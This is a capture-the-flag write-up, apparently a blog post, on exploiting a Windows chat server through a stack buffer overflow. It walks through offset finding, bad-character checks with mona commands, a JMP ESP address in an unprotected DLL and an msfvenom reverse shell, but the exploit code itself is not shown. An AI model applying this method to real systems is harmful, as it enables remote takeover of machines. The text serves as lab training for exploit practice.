The purpose of this CTF is to reverse engineer a chat program and write a script that will exploit a Windows machine. It is a great example of buffer overflow, so I recommend you trying this one 😉
I decided to check the FTP service. In this case you can login anonymously to the FTP service. Before downloading all files, remember to change type of file transfer to binary in order not to get corrupted files.
Now you have to transfer this chatserver.exe and .dll file to our Windows VM. I used Windows 7 64 bit enterprise version. Remember to configure network correctly, because Kali VM and Windows VM must be in the same network. Turn off defender and firewall, before running .exe file.
After my quick recon on chatserver I decided to try stack buffer overflow on the message. As you can see below, EAX, ESP, EBP, EIP has been overwritten with “B”. EIP has been overwriteen with “B” (42), so it is possible to overwrite this pointer (EIP) to launch something malicious. I use Immunity debugger to reverse engineer this executable.
msf-pattern creates long pattern. This may suggest which byte has been overwritten with specific string.
We can see that the pointer (EIP) has been overwritten with 31704330. So we can check the offset
The offset is 2012. That is mean that 2013’th byte will be beginning of EIP. Below I have written an exploit which communicate with chatserver.exe
POC of crashing application, because of buffer overflow. Message was long enough to overwrite other variables.
EIP has been overwritten with 5858 which is “X”. msg variable contains 2012 signs and then XXXX
Now we can go start looking for bad chars, so I added the full list of bad chars excluding \x00
In process of looking for bad chars the easiest way is to use mona.py, which I included to immunity debugger.
I have changed payload, because .encode() function probably shortens the variable and it doesn’t work. So instead of encoding I just added “b” before every line of bad chars variable.
I have run again the chatserver and script and followed the ESP.
In Hex Dump you can check manually if every char is there, but the fastest way is to use mona
Now you have to change working folder and create mona bytearray
!mona config -set workingfolder c:\mona\%p
!mona bytearray -b “\x00”
Run the program, execute the exploit and run in immunity debugger:
!mona compare -f C:\mona\chatserver\bytearray.bin -a
There are only 2 rows in which protection is disabled (all false). It is .dll and it is a .exe file. In this case, I am going to target dll
Now I want the address which I found to become a EIP pointer, so I need to modify the exploit code. This address must be written backwards.
I use debugger to check for sure if this address is JMP ESP
I used msfvenom to create payload. Remember to change ip address of local machine for tun0 and the ip address of CTF box.
Final exploit code is here. Remember to change ip address to target box.
I gained the shell and found the flag.
Thanks to this CTF I have learnt a lot of great stuff related with stack buffer overflow. It is a great preparation for OSCP buffer overflow boxes.
damn son, ur a haxXxor